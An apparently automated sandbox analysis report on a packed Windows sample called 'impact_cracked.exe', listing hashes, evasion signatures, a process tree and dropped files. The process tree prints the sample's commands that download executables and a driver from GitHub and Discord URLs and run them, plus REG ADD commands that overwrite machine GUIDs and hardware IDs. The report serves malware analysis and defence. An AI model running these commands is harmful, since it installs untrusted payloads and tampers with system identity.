Analysis

  • max time kernel
    74s
  • max time network
    80s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    22/12/2023, 00:14

General

  • Target
    impact_cracked.exe
  • Size
    6.1MB
  • MD5
    f8164877a685b3ff1aa8a4c7292e699c
  • SHA1
    279aba8c802d15f3507210b6bf702b678e30f5a3
  • SHA256
    20ffe6d5ffeefecc28bef795ba84e3bb8339522e103c32705b0360f24051b12c
  • SHA512
    f381a0789c50a89022acfc764766931ee43577637f6e11240ee6eade6a62f5e84a8c8b68fd2b240eddf184278693279e8a84a4863f2025f568e8acf0833d653c
  • SSDEEP
    98304:IB38757d1xzB92ETr/SG/e6ML0kySVPziZ42xBTBcSn7JNXjEFsZg5:Gs7D1xH3/SG/KL0fSNmZ9xhBj7zzes6

Malware Config

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  • Downloads MZ/PE file
  • Checks BIOS information in registry (2 TTPs, 2 IoCs)
    BIOS information is often read in order to detect sandboxing environments.
  • Executes dropped EXE (1 IoC)
  • Themida packer (7 IoCs)
    Detects Themida, an advanced Windows software protection system.
  • VMProtect packed file (3 IoCs)
    Detects executables packed with the VMProtect commercial packer.
  • Checks whether UAC is enabled (1 TTP, 1 IoC)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  • Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  • Drops file in Windows directory (6 IoCs)
  • Modifies registry key (1 TTP, 10 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoC)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe
    "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of WriteProcessMemory
    PID:4948
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:928
      • C:\Windows\system32\certutil.exe
        certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\impact_cracked.exe" MD5
        3⤵
        PID:4752
      • C:\Windows\system32\find.exe
        find /i /v "md5"
        3⤵
        PID:3264
      • C:\Windows\system32\find.exe
        find /i /v "certutil"
        3⤵
        PID:4584
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe >nul 2>&1
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4984
      • C:\Windows\system32\curl.exe
        curl https://raw.githubusercontent.com/0vowp/s/main/1251766222259237725371applecleaner_2.exeaner_2.exe --output C:\Windows\IME\AppleCleaner.exe
        3⤵
        • Drops file in Windows directory
        PID:640
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c start C:\Windows\IME\AppleCleaner.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1244
      • C:\Windows\IME\AppleCleaner.exe
        C:\Windows\IME\AppleCleaner.exe
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Checks whether UAC is enabled
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        PID:3192
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c del C:\Windows\IME\AppleCleaner.exe
      2⤵
      PID:1116
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
      PID:5060
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1944
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500820504596/Solution.exe --output C:\Windows\GameBarPresenceWriter\Solution.exe
        3⤵
        • Drops file in Windows directory
        PID:1032
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4500
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501239947345/Solution64.sys --output C:\Windows\GameBarPresenceWriter\Solution64.sys
        3⤵
        • Drops file in Windows directory
        PID:1012
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1800
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754501659365396/Disk1.exe --output C:\Windows\GameBarPresenceWriter\Disk1.exe
        3⤵
        • Drops file in Windows directory
        PID:1020
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:920
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500023586896/Disk2.exe --output C:\Windows\GameBarPresenceWriter\Disk2.exe
        3⤵
        • Drops file in Windows directory
        PID:2128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1444
      • C:\Windows\system32\curl.exe
        curl --silent https://cdn.discordapp.com/attachments/1154208909339406346/1157754500342362132/Mac.bat --output C:\Windows\GameBarPresenceWriter\Mac.bat
        3⤵
        • Drops file in Windows directory
        PID:4812
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2992
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 6131 /f
        3⤵
        • Modifies registry key
        PID:3792
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:812
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 6131 /f
        3⤵
        • Modifies registry key
        PID:672
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4384
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {613121375-3155415346-1546629722} /f
        3⤵
        • Modifies registry key
        PID:1332
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1688
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 613432124-166506641-25780881 /f
        3⤵
        • Modifies registry key
        PID:5096
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2924
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {613432124-166506641-25780881} /f
        3⤵
        • Modifies registry key
        PID:4060
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3640
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {613432124-166506641-25780881} /f
        3⤵
        • Modifies registry key
        PID:2856
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
      2⤵
      PID:3488
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 613432124-166506641-25780881 /f
        3⤵
        • Modifies registry key
        PID:1836
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
      2⤵
      PID:4540
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 613432124-166506641-25780881 /f
        3⤵
        • Modifies registry key
        PID:5084
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
      2⤵
      PID:1876
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 613710104-174630705-33274807 /f
        3⤵
        • Modifies registry key
        PID:3332
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
      2⤵
      PID:4216
      • C:\Windows\system32\reg.exe
        REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 613710104-174630705-33274807 /f
        3⤵
        • Modifies registry key
        PID:3120
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
      2⤵
      PID:2636

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Windows\IME\AppleCleaner.exe
    • Filesize
      2.9MB
    • MD5
      4639664afed57a9e2ebb0373a715f159
    • SHA1
      a7c166c3eac948aed501aac067214001df4e09b6
    • SHA256
      af9e98021b05a245873ccf8bc952f89a2a856ad70323ab2d5a6687bdf811fbd3
    • SHA512
      5b042a548cb1441b7e5fb2d526db386f0d842d998a8ff5685c9516db5402ad2d1dd7317be22e9c62349d46f961382cbc64db59564f54fe045f507791efea8ff9
  • C:\Windows\IME\AppleCleaner.exe
    • Filesize
      3.6MB
    • MD5
      f96eb2236970fb3ea97101b923af4228
    • SHA1
      e0eed80f1054acbf5389a7b8860a4503dd3e184a
    • SHA256
      46fe5192387d3f897a134d29c069ebf39c72094c892134d2f0e77b12b11a6172
    • SHA512
      2fd2d28c5f571d40b43a4dd7a22d367ba42420c29627f21ca0a2052070ffb9f689d80dad638238189eed26ed19af626f47e70f1207e10007041c620dac323cc7
  • memory/3192-14-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
    • Filesize
      9.6MB
  • memory/3192-10-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
    • Filesize
      9.6MB
  • memory/3192-12-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp
    • Filesize
      2.0MB
  • memory/3192-13-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
    • Filesize
      9.6MB
  • memory/3192-15-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
    • Filesize
      9.6MB
  • memory/3192-16-0x00007FF7DE790000-0x00007FF7DF132000-memory.dmp
    • Filesize
      9.6MB
  • memory/3192-18-0x00007FFC05C10000-0x00007FFC05E05000-memory.dmp
    • Filesize
      2.0MB
  • memory/4948-6-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
    • Filesize
      11.0MB
  • memory/4948-2-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
    • Filesize
      11.0MB
  • memory/4948-1-0x00007FFC05E10000-0x00007FFC05E12000-memory.dmp
    • Filesize
      8KB
  • memory/4948-0-0x00007FF7370D0000-0x00007FF737BD0000-memory.dmp
    • Filesize
      11.0MB